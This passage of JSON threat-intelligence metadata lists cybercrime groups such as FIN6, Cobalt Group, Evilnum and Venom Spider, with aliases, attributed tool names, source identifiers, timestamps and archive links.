"ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f5c90ccc-0f18-4e07-a246-b62101ab2f6f", "created_at": "2023-01-06T13:46:38.854407Z", "updated_at": "2026-04-10T02:00:03.122844Z", "deleted_at": null, "main_name": "GC02", "aliases": [ "Golden Chickens", "Golden Chickens02", "Golden Chickens 02" ], "source_name": "MISPGALAXY:GC02", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7", "created_at": "2022-10-25T16:07:23.704358Z", "updated_at": "2026-04-10T02:00:04.718034Z", "deleted_at": null, "main_name": "Harvester", "aliases": [], "source_name": "ETDA:Harvester", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Graphon", "Metasploit", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "88802a4b-5b3d-42ee-99e6-8a4f5fd231f6", "created_at": "2023-01-06T13:46:38.851345Z", "updated_at": "2026-04-10T02:00:03.121861Z", "deleted_at": null, "main_name": "GC01", "aliases": [ "Golden Chickens", "Golden Chickens01", "Golden Chickens 01" ], "source_name": "MISPGALAXY:GC01", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51", "created_at": "2022-10-25T16:07:23.474746Z", "updated_at": "2026-04-10T02:00:04.623746Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "ATK 67", "Cobalt Gang", "Cobalt Spider", "G0080", "Gold Kingswood", "Mule Libra", "TAG-CR3" ], "source_name": "ETDA:Cobalt Group", "tools": [ "ATMRipper", "ATMSpitter", "Agentemis", "AmmyyRAT", "AtNow", "COOLPANTS", "CobInt", "Cobalt Strike", "CobaltStrike", "Cyst Downloader", "Fareit", "FlawedAmmyy", "Formbook", "Little Pig", "Metasploit Stager", "Mimikatz", "More_eggs", "NSIS", "Nullsoft Scriptable Install System", "Pony Loader", "Ripper ATM", "SDelete", "Siplog", "SoftPerfect Network Scanner", "SpicyOmelette", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Terra Loader", "ThreatKit", "VenomKit", "cobeacon", "win.xloader" ], "source_id": "ETDA", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null }, { "id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242", "created_at": "2022-10-25T15:50:23.744036Z", "updated_at": "2026-04-10T02:00:05.294413Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider" ], "source_name": "MITRE:Cobalt Group", "tools": [ "Mimikatz", "More_eggs", "SpicyOmelette", "SDelete", "Cobalt Strike", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "7a257844-df90-4bd4-b0f1-77d00ff82802", "created_at": "2022-10-25T16:07:24.376356Z", "updated_at": "2026-04-10T02:00:04.964565Z", "deleted_at": null, "main_name": "Venom Spider", "aliases": [ "Golden Chickens", "TA4557", "Venom Spider" ], "source_name": "ETDA:Venom Spider", "tools": [ "More_eggs", "PureLocker", "SONE", "SpicyOmelette", "StealerOne", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Taurus Loader Reconnaissance Module", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraCrypt", "TerraLogger", "TerraPreter", "TerraRecon", "TerraStealer", "TerraTV", "TerraWiper", "ThreatKit", "VenomKit", "VenomLNK", "lite_more_eggs" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434484, "ts_updated_at": 1775792168, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0795455275faf6b5dfed815cbd61d40a6cd88595.pdf", "text": "https://archive.orkl.eu/0795455275faf6b5dfed815cbd61d40a6cd88595.txt", "img": "https://archive.orkl.eu/0795455275faf6b5dfed815cbd61d40a6cd88595.jpg" } }